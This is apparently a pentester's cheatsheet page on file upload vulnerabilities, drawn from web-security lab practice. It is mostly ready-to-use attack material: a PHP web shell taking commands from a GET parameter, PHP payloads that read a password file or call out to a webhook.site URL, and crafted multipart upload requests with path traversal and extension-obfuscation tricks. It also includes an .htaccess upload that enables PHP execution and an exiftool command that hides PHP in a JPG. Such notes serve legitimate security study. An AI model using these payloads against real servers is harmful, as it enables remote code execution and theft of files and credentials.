File Upload

File upload vulnerabilities are when a web server allows users to upload files to its filesystem without sufficiently validating things like ; - Name - Content - Size - Type

Leak in Content-Type response

The Content-Type response header may provide clues about what kind of file the server believes it has served. If this header hasn’t been explicitly set by the application code, it typically reflects the result of the file extension–MIME type mapping

Basic php

<?php echo file_get_contents('/home/user/whatever'); ?>
<?php echo system($_GET['command']); ?>

==> GET /example/exploit.php?command=whoami HTTP/1.1
<?php echo file_get_contents("https://webhook.site/5c9c4652-1d78-490f-aede-cb4820ab229f"); ?>

Content-Type multipart/form-data

------geckoformboundaryb1c53164ae34b296ed4c82a1c3d3e0d2
Content-Disposition: form-data; name="avatar"; filename="discord.php"
Content-Type: image/jpeg

<?php echo file_get_contents('/home/user/password'); ?>

Path traversal in form 

Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php"
Content-Type: application/octet-stream

<?php echo file_get_contents('/home/user/password'); ?>

Sever doesn't execute php

Servers don’t execute PHP files by default. There are multiple ways to enable the execution of PHP files depending on the server technology. For example, in an Apache server, to run PHP in every directory, you need to add the following line to /etc/apache2/apache2.conf

LoadModule php_module /usr/lib/apache2/modules/libphp.so
    AddType application/x-httpd-php .php

The server can also be configured to apply specific rules to individual folders. This is done in the .htaccess file with those lines : 

AddHandler application/x-httpd-php .php .php5
AddType application/x-httpd-php .php .php5

Example of a manipulated form where I add a htaccess file to run exploit.php5

Content-Disposition: form-data; name="avatar"; filename=".htaccess%00.jpg"
Content-Type: image/jpeg

AddHandler application/x-httpd-php .php .php5
AddType application/x-httpd-php .php .php5
------geckoformboundary660c86820a5865845b8db39c38c19ec

Example of directory-specific configuration in a IIS server, located in web.config

<staticContent>
    <mimeMap fileExtension=".json" mimeType="application/json" />
    </staticContent>

Obfuscating

.php5
.shtml
exploit.php.jpg
exploit.PhP
exploit.php;.jpg
exploit.php%00.jpg
exploit.p.phphp

Intrinsic properties of files

JPG :

  • Files always begin with bytes FF D8 FF

Polyglot files

We can create polyglot files with tools like exiftool that can allow us to hide malicious code in a different file type than the code.

For example, malicious php code in a .jpg 

.\exiftool.exe -Comment="<?php echo 'START ' . file_get_contents('/home/user/password') . ' END'; ?>" C:\Users\past3ll3\Documents\portswigger\jpg.jpg -o polyglot.php

(nice poc: https://poeticalhacking.net/blog/posts/turning-a-jpg-into-a-reverse-shell-with-exiftool/)

PreviousGraphQLNextHTTP Request Cheatsheet

Last updated

Was this helpful?